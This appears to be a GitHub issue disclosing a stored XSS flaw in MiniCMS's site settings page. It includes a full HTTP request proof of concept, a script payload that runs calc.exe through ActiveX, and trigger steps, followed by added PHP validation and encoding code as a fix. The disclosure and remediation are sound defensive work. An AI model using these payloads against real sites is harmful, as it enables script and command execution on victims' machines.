bg5sbk/MiniCMS

There is an XSS vulnerability that can attack users to execute commands

harry1080 opened this issue · 0 comments

There is a stored XSS vulnerability in the website address field on the site settings page, which can be executed by constructing a PoC.
PoC:

```
POST /MiniCMS-master/MiniCMS-master/mc-admin/conf.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/MiniCMS-master/MiniCMS-master/mc-admin/conf.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 449
Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; lang=3f81c1cb88c4e6355b4f5f02b32b4bdf8a9479da%7Een
Connection: close
Upgrade-Insecure-Requests: 1

site_name=%E6%88%91%E7%9A%84%E7%BD%91%E7%AB%99&site_desc=%E5%8F%88%E4%B8%80%E4%B8%AAMiniCMS%E7%BD%91%E7%AB%99&site_link=http%3A%2F%2F127.0.0.1%2FMiniCMS-master%2FMiniCMSmaste[payload]&user_nick=%E7%A5%9E%E7%A7%98%E4%BA%BA&user_name=admin&user_pass=&comment_code=%26lt%3Bsvg%2Fonload%3Dalert%28%27xss%27%29%26gt%3B&save=%E4%BF%9D%E5%AD%98%E8%AE%BE%E7%BD%AE
```

```
payload = "><script>var%20objShell;objShell=new%20ActiveXObject("WScript.Shell").run("calc.exe");</script><"
```

Example:
1. Log in to the admin backend, locate the site, and find the website address.
2. Construct the exp in the site_link parameter.
3. Access the page through IE and run ActiveX.
4. The CMD command pops up.
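
For maintainers triaging this report, the following is an added example and not MiniCMS code: one way to close the `site_link` injection is to validate the value when the settings form is saved and to HTML-encode it wherever it is written into a page. The function names `normalize_site_link` and `attr` are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example, not part of MiniCMS. Function names are hypothetical.

// On save: accept only absolute http/https URLs with a host.
// Returns the trimmed URL, or null if the value must be rejected.
function normalize_site_link(string $raw): ?string
{
    $url = trim($raw);
    // Whitespace, control characters, quotes and angle brackets have no
    // place in a stored URL and are what lets a value leave an attribute.
    if ($url === '' || preg_match('/[\x00-\x20"\'<>`]/', $url)) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host'])) {
        return null;
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null;
    }
    return $url;
}

// On output: encode for an HTML attribute context. ENT_QUOTES covers both
// quote styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs (the second mirrors the shape of the reported value).
$samples = [
    'http://127.0.0.1/MiniCMS-master',
    'http://127.0.0.1/MiniCMS-master"><script>alert(1)</script><"',
    'javascript:alert(1)',
];

foreach ($samples as $s) {
    $verdict = normalize_site_link($s) === null ? 'REJECT' : 'ACCEPT';
    printf("%-6s %s\n", $verdict, attr($s));
}

// Even if an unvalidated value is already stored, encoding at output keeps
// it inside the attribute instead of letting it close the tag.
echo '<input type="text" name="site_link" value="' . attr($samples[1]) . '">' . "\n";
```

Both controls are needed: validation keeps bad data out of the stored configuration, while output encoding protects every page that echoes a value saved before the fix.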